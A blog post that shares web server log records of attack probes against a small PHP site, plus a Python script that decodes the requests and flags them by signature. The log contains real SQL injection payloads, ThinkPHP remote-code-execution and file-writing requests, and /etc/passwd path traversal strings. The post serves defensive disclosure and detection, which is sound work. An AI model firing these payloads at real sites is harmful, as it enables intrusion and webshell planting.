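While going through the server logs recently, I found some records of attack attempts. I'm sharing them here so that others can avoid these vulnerabilities.
Even though this is a small project, the attackers still wanted to get a backdoor.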
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/?a=dopara&app_type=shop&c=product_admin&id=1+union+SELECT+1%2C2%2C3%2C40890%2A43445%2C5%2C6%2C7+limit+5%2C1+%23&n=product
ERR: 无法加载控制器:ProductAdmin
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/?a=doSearchParameter&appno=0+union+select+43444%2A40429%2C1--+&c=language_general&editor=cn&n=language&site=admin&word=fuckyou
ERR: 无法加载控制器:LanguageGeneral
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/?n=language&c=language_general&a=doExportPack
ERR: 无法加载控制器:LanguageGeneral
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/cms_channel.php?del=123456+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%28202072102%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--%2B
ERR: 无法加载控制器:CmsChannel.php
[ 2020-08-21T03:06:46+08:00 ] 192.168.0.12 /admin/cms_channel.php?del=123456+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%28202072102%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--%2B
ERR: 无法加载控制器:CmsChannel.php
[ 2020-08-21T03:06:47+08:00 ] 192.168.0.12 /admin/cms_channel.php?del=123456+AND+%28SELECT+1+FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x7e%2Cmd5%28202072102%29%2C0x7e%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x%29a%29--%2B
ERR: 无法加载控制器:CmsChannel.php
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api.php?c=project&f=index&id=news&sort=1+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%28994262690%29%29%29+--+&token=1234
ERR: 无法加载控制器:Project
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api/sms_check.php?param=1%27+and+updatexml%281%2Cconcat%280x7e%2C%28SELECT+MD5%281234%29%29%2C0x7e%29%2C1%29--+
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api.php?c=project&f=index&id=news&sort=1+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%28994262690%29%29%29+--+&token=1234
ERR: 无法加载控制器:Project
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api/sms_check.php?param=1%27+and+updatexml%281%2Cconcat%280x7e%2C%28SELECT+MD5%281234%29%29%2C0x7e%29%2C1%29--+
ERR: 无法加载控制器:SmsCheck.php
[ 2020-05-17T04:07:27+08:00 ] 192.168.0.12 /api.php?c=project&f=index&id=menu&sort=IF(1=1,1,(select+1+union+select+2))%23
ERR: 无法加载控制器:Project
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /index.php?a=company_focus&c=AjaxPersonal&company_id%5B0%5D=match&company_id%5B1%5D%5B0%5D=aaaaaaa%22%29+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%2899999999%29%29%29+--+a&m=
ERR: 无法加载控制器:AjaxPersonal
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /index.php?function=call_user_func_array&s=%2FIndex%2F%5Cthink%5Capp%2Finvokefunction&vars%5B0%5D=printf&vars%5B1%5D%5B%5D=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91
ERR: 无法加载控制器:\think\app
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /index.php?%22%29=&a=fetch&content=%3C%3Fphp+file_put_contents%28%2214110.php%22%2C%22%3C%3Fphp+echo+1185627289
ERR: 非法操作:fetch
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /mobile/index/index2/id/1%29%20and%20%28select%201%20from%20%28select%20count%28%2A%29,concat%280x716b627671,%28select%20md5%28936989754%29%29,0x716b627671,floor%28rand%280%29%2A2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29--
ERR: 非法操作:index2
[ 2020-04-20T03:01:32+08:00 ] 192.168.0.12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=31337
ERR: 无法加载控制器:\think\app
[ 2020-04-22T00:38:11+08:00 ] 192.168.0.12 /index.php?s=index/\think\view\driver\Php/display&content=<?php%20phpinfo();?>
ERR: 无法加载控制器:\think\view\driver\Php
[ 2020-04-22T00:38:11+08:00 ] 192.168.0.12 /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
ERR: 无法加载控制器:\think\app
[ 2020-07-12T04:44:03+08:00 ] 192.168.0.12 /index.php?a=display&templateFile=../../../../../../../etc/passwd
ERR: 非法操作:display
[ 2020-07-12T04:44:04+08:00 ] 192.168.0.12 /index.php?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
ERR: 无法加载控制器:\think\app
[ 2020-07-12T04:44:05+08:00 ] 192.168.0.12 /index.php?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Edie(md5('sec_test2019'));%3C/php%3E
ERR: 非法操作:fetch
[ 2020-07-12T04:44:05+08:00 ] 192.168.0.12 /index.php?a=display&templateFile=../../../../../../../etc/passwd
ERR: 非法操作:display
[ 2021-03-22T04:46:29+08:00 ] 192.168.0.12 /?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Efile_put_contents('secquan.php',base64_decode('PD9waHAgZWNobygiYnVnIGV4aXN0Iik7Pz4='))%3C/php%3E
ERR: 非法操作:fetch
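
One way to triage a log like the one above is to URL-decode each request and match it against signatures for the probe families that appear in it. This is an added example, not the author's code: the rule names and the line format are assumptions inferred from the entries above, the sample requests are copied from this log, and the `ERR:` lines ("cannot load controller" / "illegal operation") are skipped.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Line shape seen in this log: "[ <ISO timestamp> ] <client ip> <request URI>"
LINE_RE = re.compile(r"^\[\s*(?P<ts>\S+)\s*\]\s+(?P<ip>\S+)\s+(?P<uri>.+)$")

# Signatures derived from the probes in the log above (illustrative, not a complete ruleset).
RULES = [
    ("sqli_error_based", re.compile(r"extractvalue\s*\(|updatexml\s*\(|floor\s*\(\s*rand\s*\(", re.I)),
    ("sqli_union", re.compile(r"union\s+select", re.I)),
    ("thinkphp_invoke", re.compile(r"\\think\\(app|view)|call_user_func_array", re.I)),
    ("path_traversal", re.compile(r"(\.\./){2,}")),
    ("php_code_in_param", re.compile(r"<\?php|<php>|file_put_contents\s*\(", re.I)),
]

# Requests copied from the log above, plus one ERR line that must be ignored.
SAMPLE = r"""
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /api.php?c=project&f=index&id=news&sort=1+and+extractvalue%281%2Cconcat%280x7e%2Cmd5%28994262690%29%29%29+--+&token=1234
[ 2020-03-25T09:42:25+08:00 ] 192.168.0.12 /admin/?a=dopara&app_type=shop&c=product_admin&id=1+union+SELECT+1%2C2%2C3%2C40890%2A43445%2C5%2C6%2C7+limit+5%2C1+%23&n=product
[ 2020-04-20T03:01:32+08:00 ] 192.168.0.12 /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=31337
[ 2020-07-12T04:44:03+08:00 ] 192.168.0.12 /index.php?a=display&templateFile=../../../../../../../etc/passwd
ERR: 非法操作:display
[ 2020-07-12T04:44:05+08:00 ] 192.168.0.12 /index.php?a=fetch&templateFile=public/index&prefix=''&content=%3Cphp%3Edie(md5('sec_test2019'));%3C/php%3E
"""
# Constructed benign request for contrast (not from the page's log).
BENIGN = "[ 2020-07-12T04:45:00+08:00 ] 192.168.0.12 /index.php?c=news&id=42"

def classify(line):
    """Return (timestamp, ip, [matched rule names]), or None for non-request lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None  # blank lines and "ERR: ..." lines
    # Decode twice so double-encoded payloads (%2528 -> %28 -> "(") still match.
    uri = unquote_plus(unquote_plus(m["uri"]))
    return m["ts"], m["ip"], [name for name, rx in RULES if rx.search(uri)]

def summarize(text):
    """Return (Counter of rule hits, number of flagged requests) for a whole log."""
    counts, flagged = Counter(), 0
    for line in text.splitlines():
        rec = classify(line)
        if rec and rec[2]:
            flagged += 1
            counts.update(rec[2])
    return counts, flagged

if __name__ == "__main__":
    print(summarize(SAMPLE + BENIGN))
```

A hit only means the request looks like a probe; whether it succeeded still has to be checked against the application's response and the files on disk.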
Author: 刘俊涛's blog